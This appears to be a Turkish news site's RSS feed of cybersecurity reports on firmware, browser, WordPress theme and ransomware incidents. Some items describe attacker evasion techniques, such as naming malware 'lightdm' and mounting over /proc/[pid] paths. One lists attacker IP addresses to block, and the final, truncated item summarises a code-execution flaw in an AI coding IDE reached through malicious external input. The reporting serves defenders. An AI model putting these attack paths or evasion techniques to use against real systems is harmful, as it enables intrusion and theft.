            <description><![CDATA[ Lenovo, InsydeH2O UEFI firmware üzerinde tespit edilen ve SMM ayrıcalıklarıyla kötü amaçlı kod çalıştırılmasına neden olabilecek altı yüksek riskli güvenlik açığı için BIOS güncellemeleri yayımladı. Açıklar, bazı IdeaCentre ve Yoga AIO modellerini etkiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_6891149402977.webp" length="49144" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:46 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Lenovo BIOS açıkları hangi cihazları etkiliyor, SMM modunda ne tür istismarlar yapılabiliyor, güncellemeler ne zaman yayımlanacak, Secure Boot atlatması nasıl gerçekleşiyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #1a73e8; font-size: 28px; font-weight: bold; margin-bottom: 24px;">Lenovo, Secure Boot Mekanizmasını Atlatan Kritik BIOS Açıklarını Gidermek İçin Güncellemeler Yayınladı</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Lenovo, belirli hepsi bir arada (All-in-One) masaüstü bilgisayar modellerinde bulunan ve Secure Boot mekanizmasını aşmaya imkân tanıyan <strong>altı yüksek önem derecesine sahip BIOS açığını</strong> kapatmak amacıyla yeni firmware güncellemeleri yayımladı.</p>
<h3 style="color: #1a73e8; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Güvenlik Açıklarının Kaynağı ve Etkisi</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Açıklar, Lenovo için Insyde tarafından özelleştirilen <em>InsydeH2O UEFI</em> firmware kodlarında bulunuyor. Saldırganlar için büyük tehlike arz eden bu açıklar, işletim sistemi yüklenmeden önce çalışan ve yüksek kalıcılığa sahip <strong>System Management Mode (SMM)</strong> katmanında yer alıyor. Bu sayede, kötü niyetli kişiler sisteme derinlemesine erişim sağlayabiliyor.</p>
<h3 style="color: #1a73e8; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Etkilenen Modeller</h3>
<ul style="font-size: 17px; margin-bottom: 20px; padding-left: 20px; list-style-type: disc;">
<li>IdeaCentre AIO 3 24ARR9</li>
<li>IdeaCentre AIO 3 27ARR9</li>
<li>Yoga AIO 27IAH10</li>
<li>Yoga AIO 32ILL10</li>
<li>Yoga AIO 32IRH8</li>
</ul>
<h3 style="color: #1a73e8; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Tespit Edilen Güvenlik Açıkları ve CVSS Puanları</h3>
<ul style="font-size: 17px; margin-bottom: 20px; padding-left: 20px; list-style-type: decimal;">
<li><strong>CVE-2025-4421:</strong> Doğrulanmamış RSI kaydı ile SMRAM belleğe yazım yapılabiliyor. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4422:</strong> SMM bellekte bozulmaya yol açan işleyici açığı. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4423:</strong> SMM içerisinde keyfi bellek yazımı ile kod çalıştırma. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4424:</strong> Yanıltıcı girişlerle firmware ayarlarının değiştirilmesi. (CVSS: 6.0)</li>
<li><strong>CVE-2025-4425:</strong> Stack buffer overflow ile SMM yetki yükselmesi ve kod çalıştırma. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4426:</strong> SMRAM içeriğinin sızdırılması yoluyla hassas veri açığa çıkması. (CVSS: 6.0)</li>
</ul>
<h3 style="color: #1a73e8; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Bildirim ve Koordinasyon Süreci</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Binarly güvenlik araştırma firması, bu açıkları 8 Nisan 2025 tarihinde Lenovo’ya bildirdi. Lenovo, 16 Haziran’da durumu doğruladı ve 90 günlük koordineli açıklama sürecinin ardından 29 Temmuz 2025’te kamuoyuna duyurdu.</p>
<h3 style="color: #1a73e8; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Güncellemeler ve Tavsiyeler</h3>
<p style="font-size: 17px; margin-bottom: 20px;"><strong>IdeaCentre AIO 3</strong> modelleri için <em>O6BKT1AA</em> firmware sürümü yayımlandı ve kullanıcılara en kısa sürede güncelleme yapmaları öneriliyor. <strong>Yoga AIO</strong> modelleri için güncellemeler henüz yayımlanmadı; Lenovo, bu yamaların 30 Eylül – 30 Kasım 2025 tarihleri arasında sunulacağını bildirdi.</p>
<p style="font-size: 17px;">Insyde tarafından yapılan açıklamada, bu açıkların sadece Lenovo için geliştirilmiş özelleştirilmiş InsydeH2O firmware sürümlerinde bulunduğu, tüm InsydeH2O kullanan sistemlerin etkilenmediği vurgulandı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Apple, Chrome kullanıcılarını hedef alan sıfır gün saldırısında kullanılan güvenlik açığını yamadı</title>
            <link>https://cumha.com.tr/apple-chrome-kullanicilarini-hedef-alan-sifir-gun-saldirisinda-kullanilan-guvenlik-acigini-yamadi</link>
            <guid>https://cumha.com.tr/apple-chrome-kullanicilarini-hedef-alan-sifir-gun-saldirisinda-kullanilan-guvenlik-acigini-yamadi</guid>
            <description><![CDATA[ Apple, Google Chrome tarayıcısındaki GPU süreçlerini etkileyen ve kötü niyetli HTML sayfalarıyla uzaktan kod çalıştırılmasına yol açabilen CVE-2025-6558 numaralı kritik güvenlik açığına karşı güncellemeler yayımladı. Açığın devlet destekli tehdit gruplarınca istismar edildiği bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_6891152dc1618.webp" length="44696" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:45 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-6558 açığı ne tür saldırılara olanak tanıyor, hangi Apple cihazları etkileniyor, bu açık devlet destekli gruplar tarafından nasıl kullanıldı, CISA federal kurumlara ne zaman yama zorunluluğu getirdi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #0071e3; font-size: 28px; font-weight: bold; margin-bottom: 24px;">Apple, CVE-2025-6558 Sıfır Gün Açığını Kapatmak İçin Güvenlik Güncellemeleri Yayınladı</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Apple, Chrome kullanıcılarını hedef alan ve <strong>CVE-2025-6558</strong> numarasıyla izlenen yüksek riskli sıfır gün güvenlik açığını düzeltmek amacıyla kapsamlı güncellemeler yayımladı. Bu açık, Apple’ın çoğu platformunu etkileyen <em>ANGLE</em> (Almost Native Graphics Layer Engine) adlı grafik soyutlama katmanında tespit edildi.</p>
<h3 style="color: #0071e3; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Açığın Detayları ve Riskleri</h3>
<p style="font-size: 17px; margin-bottom: 20px;">ANGLE bileşeni, OpenGL ES API çağrılarını Direct3D, Metal, Vulkan ve OpenGL gibi grafik API’lerine dönüştürür. <strong>CVE-2025-6558</strong>, özel hazırlanmış HTML sayfaları aracılığıyla tarayıcının GPU sürecinde rastgele kod çalıştırılmasına imkân veriyor. Bu da tarayıcı sandbox güvenlik sınırlarının aşılmasına ve sistem üzerinde potansiyel tam kontrol sağlanmasına yol açabiliyor.</p>
<h3 style="color: #0071e3; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Keşif ve Yama Süreci</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Google Tehdit Analiz Grubu (TAG) araştırmacıları Vlad Stolyarov ve Clément Lecigne tarafından Haziran 2025’te keşfedilen açık, 15 Temmuz’da Chrome ekibine bildirildi ve hızla yamalandı. Google, bu açığın devlet destekli tehdit aktörleri tarafından aktif şekilde kullanıldığını doğruladı.</p>
<h3 style="color: #0071e3; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Apple’ın Güncellemeleri</h3>
<ul style="font-size: 17px; margin-bottom: 20px; padding-left: 20px; list-style-type: disc;">
<li><strong>iOS 18.6 ve iPadOS 18.6:</strong> iPhone XS ve sonrası, çeşitli iPad Pro, iPad Air ve iPad mini modelleri</li>
<li><strong>macOS Sequoia 15.6</strong></li>
<li><strong>iPadOS 17.7.9:</strong> iPad Pro 12.9 inç 2. nesil, 10.5 inç modeli ve iPad 6. nesil</li>
<li><strong>tvOS 18.6:</strong> Apple TV HD ve tüm Apple TV 4K modelleri</li>
<li><strong>visionOS 2.6:</strong> Apple Vision Pro</li>
<li><strong>watchOS 11.6:</strong> Apple Watch Series 6 ve sonrası</li>
</ul>
<p style="font-size: 17px; margin-bottom: 20px;">Apple, güncellemeye ilişkin açıklamasında “Kötü amaçlı web içeriğinin işlenmesi, Safari’nin beklenmedik şekilde çökmesine neden olabilir” ifadelerini kullandı ve açığın yalnızca Apple yazılımlarında değil, aynı zamanda açık kaynak projelerde de bulunduğunu belirtti.</p>
<h3 style="color: #0071e3; font-size: 22px; font-weight: 600; margin-bottom: 18px;">CISA’dan Zorunlu Güncelleme Talimatı</h3>
<p style="font-size: 17px; margin-bottom: 20px;">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), <strong>CVE-2025-6558</strong> açığını aktif olarak istismar edilen güvenlik açıkları listesine ekleyerek federal kurumlara 12 Ağustos 2025’e kadar yama uygulamalarını zorunlu kıldı. Ayrıca, tüm sistem yöneticilerine de öncelikli olarak bu açığın kapatılması çağrısı yapıldı.</p>
<h3 style="color: #0071e3; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Apple’ın 2025’te Düzeltmediği Diğer Sıfır Gün Açıkları</h3>
<p style="font-size: 17px;">2025 yılı başından itibaren Apple tarafından halen yamalanmamış olan diğer kritik sıfır gün açıkları şunlardır:</p>
<ul style="font-size: 17px; padding-left: 20px; list-style-type: circle;">
<li>CVE-2025-24085 (Ocak 2025)</li>
<li>CVE-2025-24200 (Şubat 2025)</li>
<li>CVE-2025-24201 (Mart 2025)</li>
<li>CVE-2025-31200 ve CVE-2025-31201 (Nisan 2025)</li>
</ul>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>LightBasin grubu ATM ağına 4G’li Raspberry Pi yerleştirerek banka sistemine sızmaya çalıştı</title>
            <link>https://cumha.com.tr/lightbasin-grubu-atm-agina-4gli-raspberry-pi-yerlestirerek-banka-sistemine-sizmaya-calisti</link>
            <guid>https://cumha.com.tr/lightbasin-grubu-atm-agina-4gli-raspberry-pi-yerlestirerek-banka-sistemine-sizmaya-calisti</guid>
            <description><![CDATA[ Siber tehdit grubu LightBasin (UNC2891), fiziksel olarak bir bankanın ATM ağ anahtarına bağladığı 4G bağlantılı Raspberry Pi cihazıyla ağ içi hareketlilik sağladı. Grup, ATM yetkilendirmesini taklit ederek sahte para çekimi hedefledi ancak plan başarısız oldu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_6891154eb3782.webp" length="29786" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:43 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>LightBasin bankaya nasıl sızdı, Raspberry Pi cihazı nasıl kullanıldı, saldırganların amacı neydi, saldırı neden başarısız oldu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #b22222; font-size: 28px; font-weight: bold; margin-bottom: 24px;">LightBasin (UNC2891) Grubundan Banka Sistemlerine Gelişmiş Hibrit Saldırı</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Uluslararası düzeyde bankacılık sistemlerine yönelik siber saldırılarıyla tanınan <strong>LightBasin (UNC2891)</strong> grubu, fiziksel erişim sağladığı bir bankada sofistike bir hibrit saldırı gerçekleştirdi. Grup, ATM ağına bağlı bir ağ anahtarına <em>4G modemli Raspberry Pi</em> cihazı yerleştirerek güvenlik duvarlarını aşmayı ve iç ağa kalıcı uzaktan erişim sağlamayı başardı.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Saldırı Tespiti ve Amaç</h3>
<p style="font-size: 17px; margin-bottom: 20px;"><em>Group-IB</em> güvenlik firması, bankanın ağında tespit ettiği şüpheli trafik üzerine yaptığı incelemede bu saldırıyı ortaya çıkardı. Saldırının hedefi, ATM işlemlerini taklit ederek haksız nakit para çekimi gerçekleştirmekti.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">TinyShell ile Gizli Komuta Kontrol (C2) Bağlantısı</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırganlar, Raspberry Pi cihazını <strong>TinyShell</strong> adlı açık kaynaklı arka kapı yazılımı ile komuta ve kontrol (C2) merkezi olarak yapılandırdı. Cihaz, 4G bağlantısıyla dış dünya ile gizli iletişim kurdu.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Ağda yatay hareketler gerçekleştirilerek Banka'nın Ağ İzleme Sunucusu’na ve ardından doğrudan internet erişimi bulunan E-posta Sunucusu’na erişildi. Böylece saldırganlar iç ağda kalıcı ve geniş kapsamlı erişim sağladı.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">İleri Teknikler ve Gizlenme Yöntemleri</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Zararlı yazılımlar, Linux sistemlerinde yaygın olan “LightDM” ekran yöneticisine benzer şekilde “lightdm” ismiyle kaydedilerek tespit edilmekten kaçınıldı. Ayrıca <code>tmpfs</code> ve <code>ext4</code> dosya sistemleri kullanılarak zararlı süreçlerin <code>/proc/[pid]</code> yollarına bağlanması sağlandı; bu teknik adli analiz araçlarının işlem geçmişini görmesini engelledi.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Son Hedef: Caketap Rootkit</h3>
<p style="font-size: 17px; margin-bottom: 20px;">LightBasin’in nihai hedefi, Oracle Solaris tabanlı sistemlere <strong>Caketap</strong> adlı özel rootkit’i kurmaktı. Bu rootkit, ödeme sistemlerindeki HSM (Hardware Security Module) yanıtlarını manipüle ederek reddedilen işlemlerin onaylanmış gibi görünmesini sağlıyordu.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Ancak saldırganlar bu amaca ulaşamadan tespit edildi. Group-IB uzmanları, başarılı olsaydı büyük maddi kayıplar ve ciddi güvenlik ihlalleri yaşanabileceğini vurguladı.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Fiziksel Sızma Şüpheleri ve Ağ İletişimi</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırganların bankanın şubesine fiziksel erişim sağlayıp sağlamadığı veya bir içeriden destek alıp almadığı henüz kesinleşmedi. Ağ izleme sunucusunun her 600 saniyede bir, Raspberry Pi cihazına 929 numaralı port üzerinden veri gönderdiği belirlendi; bu da cihazın ağda pivot noktası olarak kullanıldığını gösteriyor.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600;">LightBasin Grubunun Geçmişi</h3>
<p style="font-size: 17px; margin-top: 10px;">2016’dan beri finans ve telekom sektörlerine yönelik karmaşık siber operasyonlar yürüten LightBasin, Unix sistemleri ve mobil ağ altyapılarına yönelik çok sayıda saldırı gerçekleştirmiş gelişmiş bir tehdit aktörüdür.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>WordPress Alone temasında kritik dosya yükleme açığı: Binlerce site uzaktan ele geçirildi</title>
            <link>https://cumha.com.tr/wordpress-alone-temasinda-kritik-dosya-yukleme-acigi-binlerce-site-uzaktan-ele-gecirildi</link>
            <guid>https://cumha.com.tr/wordpress-alone-temasinda-kritik-dosya-yukleme-acigi-binlerce-site-uzaktan-ele-gecirildi</guid>
            <description><![CDATA[ WordPress güvenlik firması Wordfence, Alone teması üzerinden gerçekleştirilen kimlik doğrulaması gerektirmeyen dosya yükleme saldırılarının tüm dünyada 120 binden fazla deneme ile yaygınlaştığını duyurdu. Uygulanan saldırılar, tam site kontrolü sağlayan arka kapılar içeriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689115965038e.webp" length="43998" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:42 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>WordPress Alone teması hangi sürümlerde tehlikeli, saldırganlar hangi yöntemle arka kapı kuruyor, hangi IP adreslerinden saldırı yapılıyor, kullanıcılar hangi belirtilere dikkat etmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #b22222; font-size: 28px; font-weight: bold; margin-bottom: 24px;">WordPress Alone Temasında Kritik Güvenlik Açığı Aktif Olarak İstismar Ediliyor</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Siber saldırganlar, WordPress’in yaygın kullanılan <strong>Alone</strong> temasında tespit edilen <strong>CVE-2025-5394</strong> kodlu kritik açığı aktif şekilde istismar ediyor. Bu zafiyet, uzaktan kimlik doğrulaması olmadan rastgele dosya yüklenmesine ve siteye tam erişim sağlanmasına yol açıyor.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Saldırı Yöntemi ve Etkileri</h3>
<p style="font-size: 17px; margin-bottom: 20px;"><em>Wordfence</em> tarafından tespit edilen saldırılar, Alone temasının <code>alone_import_pack_install_plugin()</code> işlevindeki güvenlik kontrol eksikliğinden kaynaklanıyor. Bu işlev, WordPress’teki <code>wp_ajax_nopriv_</code> kancası aracılığıyla yetkisiz kullanıcıların dış URL’lerden eklenti kurmasına izin veriyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırganlar, bu açığı kullanarak şifre korumalı PHP arka kapılar, ZIP arşivlerine gizlenmiş web shell’ler veya veritabanına erişim sağlayan dosya yöneticileri yüklüyor. Ayrıca, gizli yönetici hesapları oluşturularak kalıcı erişim sağlanıyor.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">İstatistikler ve Tespit Edilen Saldırılar</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Wordfence, açığın kamuya açıklanmasından önce saldırıların başladığını ve şu ana kadar <strong>120 binden fazla</strong> istismar girişiminin engellendiğini açıkladı. Saldırı belirtileri arasında yeni yönetici kullanıcıların oluşması, şüpheli ZIP dosyaları ve olağandışı <code>admin-ajax.php?action=alone_import_pack_install_plugin</code> HTTP istekleri yer alıyor.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Engellenmesi Önerilen IP Adresleri</h3>
<ul style="font-size: 17px; margin-bottom: 20px; padding-left: 20px;">
<li>193.84.71.244</li>
<li>87.120.92.24</li>
<li>146.19.213.18</li>
<li>2a0b:4141:820:752::2</li>
</ul>
<p style="font-size: 17px; margin-bottom: 20px;">Sistem yöneticilerinin bu IP adreslerini engellemesi öneriliyor.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Yama ve İletişim Problemi</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Alone temasının 7.8.3 ve önceki sürümleri saldırıya açık durumda. Geliştirici Bearsthemes, <strong>16 Haziran 2025</strong>’te 7.8.5 sürümüyle açığı yamaladı. Ancak Wordfence, ilk bildirimi <strong>30 Mayıs</strong>’ta yapmasına rağmen geliştiriciden yanıt alamadığı için durumu <strong>12 Haziran</strong>’da Envato Market ekibine iletmek zorunda kaldı.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Temanın Kullanım Alanları ve Benzer Olaylar</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Alone teması, Envato pazarında yaklaşık 10 bin satışa sahip olup, özellikle yardım kuruluşları, sivil toplum örgütleri ve bağış platformları tarafından tercih ediliyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Geçen ay, Motors adlı başka bir popüler WordPress temasında da kullanıcı doğrulama açığı kullanılarak site yöneticisi hesapları ele geçirilmişti.</p>
<p style="font-size: 17px;">Uzmanlar, WordPress kullanıcılarını temaların yanı sıra eklenti ve çekirdek bileşenleri düzenli olarak güncellemeleri konusunda uyarıyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>SafePay fidye yazılımı grubu, Ingram Micro'ya ait 3,5 TB veriyi sızdırmakla tehdit ediyor</title>
            <link>https://cumha.com.tr/safepay-fidye-yazilimi-grubu-ingram-microya-ait-35-tb-veriyi-sizdirmakla-tehdit-ediyor</link>
            <guid>https://cumha.com.tr/safepay-fidye-yazilimi-grubu-ingram-microya-ait-35-tb-veriyi-sizdirmakla-tehdit-ediyor</guid>
            <description><![CDATA[ Dünyanın en büyük BT dağıtım şirketlerinden Ingram Micro, Temmuz ayı başında gerçekleşen saldırının ardından sistemlerini kademeli olarak geri yüklese de, SafePay fidye yazılımı grubu şimdi 3,5 terabaytlık veri sızıntısıyla tehdit ediyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68911677d209a.webp" length="65668" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:41 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Ingram Micro saldırısında hangi veriler çalındı, SafePay grubu kimleri hedef alıyor, sistem kesintileri nasıl giderildi, şirket saldırganların kimliğini neden doğrulamadı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #b22222; font-size: 28px; font-weight: bold; margin-bottom: 24px;">SafePay Fidye Yazılımı Grubu, Ingram Micro’nun 3,5 TB Veri Sızıntısı Tehdidinde Bulundu</h2>
<p style="font-size: 17px; margin-bottom: 20px;">SafePay adlı fidye yazılımı grubu, küresel bilgi teknolojileri distribütörü <strong>Ingram Micro</strong>’nun sistemlerinden ele geçirildiği iddia edilen <strong>3,5 terabaytlık</strong> veriyi sızdırma tehdidinde bulundu. Grup, şirket verilerini karanlık ağdaki sızıntı portalında yayımlamayı planladığını açıkladı.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Ingram Micro; donanım, yazılım, bulut hizmetleri, lojistik ve eğitim alanlarında dünya çapında bayilere ve yönetilen hizmet sağlayıcılarına çözümler sunan çok uluslu bir teknoloji şirketidir.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Olayın Gelişimi</h3>
<p style="font-size: 17px; margin-bottom: 20px;">İlk bildirim 5 Temmuz’da yapılmış, SafePay grubunun saldırının arkasında olduğu bilgisi paylaşılmıştı. Ancak saldırı grubu, taahhüdünü resmi olarak bu hafta başında doğruladı.</p>
<p style="font-size: 17px; margin-bottom: 20px;">SafePay, kurban sistemleri şifrelemeden önce hassas verileri ele geçirip ödeme alınmadığı takdirde bunları yayımlamakla bilinen bir fidye grubu. 2024 Eylül’den beri 260’tan fazla kurbanı karanlık ağda listeliyor.</p>
<h3 style="color: #b22222; font-size: 22px; font-weight: 600; margin-bottom: 18px;">Etkiler ve Şirketin Yanıtı</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırı, Ingram Micro’nun küresel operasyonlarında kesintilere neden oldu. İnternet sitesi ve sipariş sistemleri kapandı, çalışanlara evden çalışma talimatı verildi.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Şirket, VPN erişimini yeniden sağlamak için çalıştı, parola ve çok faktörlü kimlik doğrulama (MFA) sistemlerini kapsamlı şekilde sıfırladı. Dört gün içinde tüm bölgelerdeki faaliyetler yeniden başlatıldı.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Ancak Ingram Micro, SafePay’in saldırıdan sorumlu olup olmadığı veya verilerin gerçekten sızdırılıp sızdırılmadığı konusunda henüz resmi açıklama yapmadı.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Basın kuruluşları, şirketten konuyla ilgili bilgi almakta zorlanıyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Pwn2Own 2025, WhatsApp'taki sıfır tıklama açığına 1 milyon dolarlık ödül koydu</title>
            <link>https://cumha.com.tr/pwn2own-2025-whatsapptaki-sifir-tiklama-acigina-1-milyon-dolarlik-oedul-koydu</link>
            <guid>https://cumha.com.tr/pwn2own-2025-whatsapptaki-sifir-tiklama-acigina-1-milyon-dolarlik-oedul-koydu</guid>
            <description><![CDATA[ Dünyanın en büyük siber güvenlik yarışmalarından Pwn2Own, Ekim ayında İrlanda’da düzenlenecek 2025 etkinliğinde, kullanıcı etkileşimi gerektirmeyen WhatsApp açıklarını ortaya çıkaran araştırmacılara 1 milyon dolar ödül verecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689116922488b.webp" length="54222" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:39 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>WhatsApp sıfır tıklama açığı nedir, Pwn2Own 2025 ödülleri hangi kategorileri kapsıyor, mobil cihazlara USB ile saldırı nasıl mümkün oluyor, Meta neden bu yılki yarışmayı destekliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #0a66c2; font-weight: bold; font-size: 28px; margin-bottom: 24px;">Pwn2Own 2025 İrlanda: WhatsApp Zero-Click Açığı İçin 1 Milyon Dolar Ödül</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Siber güvenlik yarışması <strong>Pwn2Own</strong>, 2025 İrlanda ayağında <em>kullanıcı etkileşimi olmadan çalışan (zero-click)</em> bir WhatsApp güvenlik açığı keşfeden araştırmacıya <strong>1 milyon dolar</strong> ödül verileceğini duyurdu.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Etkinliği organize eden <strong>Zero Day Initiative (ZDI)</strong>, WhatsApp’ın dünya genelinde 3 milyardan fazla kullanıcıya sahip olduğunu ve böyle bir açığın kritik öneme sahip olduğunu belirtti. Bu açık sayesinde hedef cihaza kullanıcı herhangi bir işlem yapmadan zararlı kod yüklenebiliyor.</p>
<h3 style="color: #0a66c2; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Etkinlik Detayları ve Kategoriler</h3>
<p style="font-size: 17px; margin-bottom: 20px;"><strong>Pwn2Own Ireland 2025</strong>, 21-24 Ekim tarihleri arasında İrlanda’nın Cork kentinde düzenlenecek. Yarışmanın sponsorları arasında Meta, Synology ve QNAP bulunuyor. Meta, WhatsApp açıklarına özel ilgi göstererek bu kategori için rekor ödül seviyesini belirledi.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Yarışmada yalnızca WhatsApp değil, akıllı telefonlar, mesajlaşma uygulamaları, ev ağı ekipmanları, giyilebilir cihazlar, akıllı gözlükler ve yazıcılar gibi sekiz farklı kategoriye yönelik saldırı senaryoları değerlendirilecek.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Bu yıl mobil cihaz kategorisi için saldırı yüzeyi genişletildi. Yarışmacılar USB bağlantısı yoluyla fiziksel olarak kilitli telefonlara da sızmayı deneyebilecek. Wi-Fi, Bluetooth ve NFC gibi kablosuz protokoller saldırı yöntemleri arasında yer almaya devam ediyor.</p>
<h3 style="color: #0a66c2; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Başvuru ve Ödül Süreci</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Kayıtlar <strong>16 Ekim 2025, saat 17:00</strong>'ye kadar alınacak ve yarışma sıralaması kura ile belirlenecek. ZDI’nın amacı, güvenlik açıklarının kötü niyetlilerden önce tespit edilerek üretici firmalarla iş birliği içinde kapatılmasıdır.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Tespit edilen açıklar firmalara bildirilecek, 90 gün içinde yamalanmazsa kamuoyuna açıklanabilecek.</p>
<h3 style="color: #0a66c2; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Geçmişten Notlar</h3>
<p style="font-size: 17px; margin-bottom: 20px;">2024 Pwn2Own Ireland etkinliğinde 70'ten fazla sıfır gün açığı keşfedildi ve toplamda 1 milyon doların üzerinde ödül dağıtıldı. Örneğin Viettel Cyber Security ekibi, QNAP NAS, Sonos hoparlör ve Lexmark yazıcı açıkları ile 205 bin dolar kazandı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Cursor IDE'de keşfedilen "CurXecute" açığı, geliştirici yetkileriyle uzaktan kod çalıştırılmasına yol açabiliyor</title>
            <link>https://cumha.com.tr/cursor-idede-kesfedilen-curxecute-acigi-gelistirici-yetkileriyle-uzaktan-kod-calistirilmasina-yol-acabiliyor</link>
            <guid>https://cumha.com.tr/cursor-idede-kesfedilen-curxecute-acigi-gelistirici-yetkileriyle-uzaktan-kod-calistirilmasina-yol-acabiliyor</guid>
            <description><![CDATA[ Yapay zekâ destekli yazılım geliştirme ortamı Cursor, harici kaynaklardan gelen zararlı girdilerin kod yürütmesine neden olabileceği bir güvenlik açığı (CVE-2025-54135) ile karşı karşıya. Araştırmacılar, bu zafiyetin fidye yazılımı ve veri sızıntılarına zemin hazırlayabileceğini belirtiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689116a6ddf62.webp" length="35824" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:38 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CurXecute açığı nasıl çalışıyor, Cursor kullanıcıları hangi sürüme geçmeli, mcp.json dosyası neden kritik, yapay zekâ ajanları dış girdilerle nasıl yönlendiriliyor</media:keywords>

                            <content:encoded>
